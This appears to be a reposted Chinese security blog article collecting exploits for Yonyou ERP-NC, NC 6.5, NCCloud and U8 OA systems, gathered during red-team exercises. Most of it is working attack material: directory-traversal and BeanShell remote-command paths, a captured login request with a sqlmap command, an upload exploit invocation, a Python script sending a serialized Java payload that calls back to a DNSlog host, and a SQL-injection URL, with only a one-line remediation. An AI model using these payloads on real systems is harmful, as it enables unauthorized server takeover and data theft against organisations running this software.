介绍:前段时间参加攻防演练的时候,发现目标系统有很多都使用了用友的产品,故整理一篇关于用友漏洞的文章。
0x01 用友ERP-NC
目录遍历漏洞
1.1 漏洞描述
用友ERP-NC
存在目录遍历漏洞,攻击者可以通过目录遍历获取敏感文件信息
1.2 漏洞复现
poc
:
/NCFindWeb?service=IPreAlertConfigService&filename=
0x02 用友NC bsh.servlet.BshServlet
远程命令执行漏洞
2.1 漏洞描述
用友NC bsh.servlet.BshServlet
存在远程命令执行漏洞,通过BeanShell
执行远程命令获取服务器权限。
2.2 漏洞复现
poc
:
/servlet/~ic/bsh.servlet.BshServlet
0x03 用友NCCloud FS
文件管理SQL
注入
3.1 漏洞描述
用友NCCloud FS
文件管理登录页面对用户名参数没有过滤,存在SQL
注入
3.2 漏洞复现
nccloud
登录界面:
文件服务器管理登录页面:
http://xxx.xxx.xxx.xxx/fs/
抓取登录数据包:
GET /fs/console?username=admin&password=%2Bz3VgEDJpVuEHdRPPzbCFTCa9Q0sKLOZ5q4ZLhxjuok%3D HTTP/1.1
Host: xxx.xxx.xxx.xxx:xxxx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Referer: http://xxx.xxx.xxx.xxx:xxxx/fs/
Cookie: JSESSIONID=1591C393D0A5D165A1D3FCBDE19E1426.server; JSESSIONID=923588EF04C38332C5E907DB6DCF1B00.server
Upgrade-Insecure-Requests: 1
sqlmap
跑注入:
sqlmap -r 1.txt -p username
0x04 用友NC 6.5
未授权文件上传漏洞
4.1 漏洞描述
用友NC6.5
版本存在未授权文件上传漏洞,攻击者可以未授权上传任意文件,进而获取服务端控制权限。
4.2 漏洞复现
nccloud
登录页面:
设置本地代理:
zsh
运行脚本:(脚本来源于tools
,禁止利用于非法用途。)
python3 nc.py -u http://xxx.xxx.xxx.xxx:xxxx/
burp
抓取本地数据包,黄色标记部分修改为上传的内容:
访问返回的链接:
0x05 用友NC XbrlPersistenceServlet
反序列化
5.1 漏洞描述
已知用友NC6.5
版本存在反序列化漏洞,攻击者可以执行系统命令,获取服务端权限。
5.2 漏洞复现
(1)利用一
漏洞URL:
/service/~xbrl/XbrlPersistenceServlet
利用脚本:
import requests
import threadpool
import urllib3
import sys
import base64
ip = "x.x.x.x"
dnslog = "*****" #dnslog把字符串转16进制替换该段,测试用的ceye.io可以回显
data = "\xac\xed\x00\x05\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x0c\x77\x08\x00\x00\x00\x10\x00\x00\x00\x01\x73\x72\x00\x0c\x6a\x61\x76\x61\x2e\x6e\x65\x74\x2e\x55\x52\x4c\x96\x25\x37\x36\x1a\xfc\xe4\x72\x03\x00\x07\x49\x00\x08\x68\x61\x73\x68\x43\x6f\x64\x65\x49\x00\x04\x70\x6f\x72\x74\x4c\x00\x09\x61\x75\x74\x68\x6f\x72\x69\x74\x79\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x04\x66\x69\x6c\x65\x71\x00\x7e\x00\x03\x4c\x00\x04\x68\x6f\x73\x74\x71\x00\x7e\x00\x03\x4c\x00\x08\x70\x72\x6f\x74\x6f\x63\x6f\x6c\x71\x00\x7e\x00\x03\x4c\x00\x03\x72\x65\x66\x71\x00\x7e\x00\x03\x78\x70\xff\xff\xff\xff\x00\x00\x00\x50\x74\x00\x11"+dnslog+"\x3a\x38\x30\x74\x00\x00\x74\x00\x0e"+dnslog+"\x74\x00\x04\x68\x74\x74\x70\x70\x78\x74\x00\x18\x68\x74\x74\x70\x3a\x2f\x2f"+dnslog+"\x3a\x38\x30\x78"
uploadHeader={"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"}
req = requests.post("http://+"ip"+/service/~xbrl/XbrlPersistenceServlet", headers=uploadHeader, verify=False, data=data, timeout=25)
print (req.text)
(2)利用二
usage
:
java -jar nc6.5.jar [target] [command]
0x06 用友U8 OA``SQL
注入漏洞
6.1 漏洞描述
用友U8 OA test.jsp
文件存在SQL
注入漏洞,由于与致远OA
使用相同的文件,于是存在了同样的漏洞。
6.2 漏洞复现
登录界面:
poc
:
/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20MD5(1))
整改方案
升级到最新版本,时刻关注官网的补丁。
作者:goout
关注公众号,后台回复 『0712-用友』,获取打包好的所有工具
来源:freebuf.com 2021-07-12 15:13:31 by: 宸极实验室Sec
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
请登录后发表评论
注册